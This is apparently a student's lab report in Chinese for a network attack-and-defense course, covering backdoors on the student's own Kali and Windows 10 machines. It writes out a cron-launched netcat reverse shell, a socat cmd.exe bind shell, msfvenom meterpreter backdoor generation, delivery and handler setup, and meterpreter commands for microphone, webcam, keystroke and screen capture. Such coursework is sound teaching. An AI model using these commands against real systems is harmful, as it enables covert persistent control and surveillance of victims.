20192418 2021-2022-2 《網路與系統攻防技術》實驗二實驗報告
1.實驗內容
(1)使用netcat獲取主機操作Shell,cron啟動某項任務(任務自定)
PS:cron是linux下用來週期性的執行某種任務或等待處理某些事件的一個守護程序
(2)使用socat獲取主機操作Shell, 任務計劃啟動
(3)使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell
(4)使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
(5)使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。
2.實驗過程
一、使用netcat獲取主機操作Shell,cron啟動
- 檢視kali和主機的ip地址:
-
這是主機的ip地址:
-
這是kali的ip地址:
- Win10主機使用ncat程式監聽本機的1221埠(埠可以隨機,這裡隨便輸入為1221)
- kali虛擬機器netcat連線Win10主機,反彈shell後,成功getshell
- cron啟動
- crontab -e指令
- 5 * * * * nc 192.168.211.1 1221 -e /bin/sh指令:每個小時的第5分鐘,反向連線Windows主機1221埠
時間到了,getshell:
二、使用socat獲取主機操作Shell, 任務計劃啟動
- 在任務計劃程式中建立任務
進入管理介面之後點選建立任務
選擇觸發器——>新建,並將觸發器配置成下圖所示:
再點選操作——>新建,在程式或腳本里面找到socat路徑,在引數裡面填寫 tcp-listen:1221 exec:cmd.exe,pty,stderr。 把cmd.exe繫結到埠1221,同時把cmd的stderr重定向到stdout上。
按Win+L鎖定主機,再解鎖之後,可以發現之前建立的任務已經開始運行了:
- 通過kali連線Win10主機
輸入 socat - tcp:192.168.211.1:1221 指令連線Win10主機,getshell
三、使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell
- 使用 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=1221 -f exe > 20192418.exe指令生成後門。
- 在Win10中使用ncat -lv 1221 > 20192418.exe指令將被控制主機進入接受檔案模式
- 在kali中使用nc 192.168.72.1 1221 < 20192418.exe將後門傳輸過去
- 在kali上使用msfconsole指令進入msf控制檯
- 輸入指令進行連線
-
輸入use exploit/multi/handler使用監聽模組,設定payload
-
輸入set payload windows/meterpreter/reverse_tcp 設定載荷,基於TCP的反向連線反彈windows shell
-
輸入 set LHOST 192.168.72.128 設定本主機IP
-
輸入 set LPORT 1221 設定本主機埠
-
輸入exploit,等待啟動後門程式
- Win10主機執行後門“20192418.exe”
- kali上getshell
四、使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
- 使用record_mic指令可以截獲一段錄音音訊:
- 使用webcam_snap指令可以呼叫攝像頭進行拍照,效果如下:
- 使用 keyscan_start 指令記錄鍵盤輸入,使用 keyscan_dump 指令讀取擊鍵記錄
- 使用 screenshot 指令可以進行截圖
五、可選加分內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell
獲得主機shell:msfvenom -p linux/x86/reverse_tcp LHOST=192.168.72.128 LPORT=2418 -x ./pwn20192418 -f elf >20192418pwnshellcode
生成完payload之後,執行MSF(具體指令參考上一過程),再執行生成的20192418pwnshellcode檔案,就可以getshell了
3.問題及解決方案
- 問題1:ncat後,在cmd輸入ls出現亂碼
- 問題1解決方案:中文名稱的資料夾和檔案會亂碼
-
問題2:傳送後門到win10主機失敗,0kb的檔案且不可開啟:
-
問題2解決方案:直接使用檔案拖動功能把後門從linux拖動到win10主機後執行
-
問題3:生成的20192418pwn檔案提示許可權不夠
-
問題3解決方案:通過chmod +x 2012418pwn命令修改檔案許可權後即可執行
4.學習感悟、思考等
基礎問題回答:
- 例舉你能想到的一個後門進入到你係統中的可能方式?
在非正規網站下載盜版軟體,後門與盜版軟體一併被下載。 - 例舉你知道的後門如何啟動起來(win及linux)的方式?
後臺插入免殺程序,替換或感染系統檔案。 - Meterpreter有哪些給你印象深刻的功能?
獲取密碼,下載登錄檔,獲取系統資訊等功能。 - 如何發現自己有系統有沒有被安裝後門?
- 定期使用防毒軟體進行查殺;
- 檢視主機上是否存在可疑程序。
感悟:
在本次實驗中,我學習到了後門的原理,學會了怎樣去製作後門和使用後門,還有MSF的使用。這次實驗的難度不大,但是在實驗過程中出現了很多各種各樣的小問題,但是都能自己逐個解決,通過實驗提高了自己的動手能力,本次實驗讓我受益匪淺。